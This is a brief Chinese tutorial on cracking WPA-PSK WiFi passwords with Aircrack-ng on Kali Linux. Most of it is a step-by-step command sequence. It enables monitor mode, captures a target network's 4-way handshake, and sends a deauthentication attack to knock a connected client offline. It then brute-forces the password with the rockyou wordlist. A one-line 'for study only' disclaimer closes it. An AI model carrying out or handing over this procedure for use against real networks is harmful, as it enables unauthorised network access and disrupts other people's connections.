wlan无线网络密码破解

WPA-PK的破解：

    不像WEP一样抓很多的包就能够破解出密码，目前WPA-PSK的破解几乎还是靠字典，而且要先捕捉到握手包（4way-handshake 四次握手包，其中包含了SSID, AP_MAC, STATION_MAC, ANonce, SNonce, MIC）。

破解实例：

    环境：Kali Linux

    工具：Aircrack-ng

第一步：iwconfig    //命令查看加载的网卡

 

第二步：airmon-ng start wlan0    //开启网卡的监听模式

第三步：airodump-ng wlan0     //扫描附近的WIFI

 

第四步：airodump-ng -c 频道(ch) --bssid 路由器MAC -w 文件名（用来存储抓包的目录）网卡名          //对指定无线WIFI网络进行抓包

 

第五步：aireplay-ng -0 10  -a 88:C3:97:32:E0:FB -c 04:CF:8C:41:5C:3B wlan0（网卡名称）    //如抓不到包，把对方踢下线，这样就会抓包成功

 

第六步：抓包成功

 

第七步：aircrack-ng -w 字典.txt   握手包.cap    //进行破解WIFI密码，解压kali自带的字典文件  路径：/usr/share/wordlists/rockyou.txt.gz

键入 ：gzip -d/usr/share/wordlists/rockyou.txt.gz，kali有自带的字典文件，解压路径为:/usr/share/wordlists/rockyou.txt）

 

最后：找到密码

 

通过wireshark打开可看到抓到的认证信息，EAP是Extensible Authentication Protocol的缩写。EAPOL就是(EAP OVER LAN )基于局域网的扩展认证协议。

 

声明：仅供学习交流，切勿攻击破坏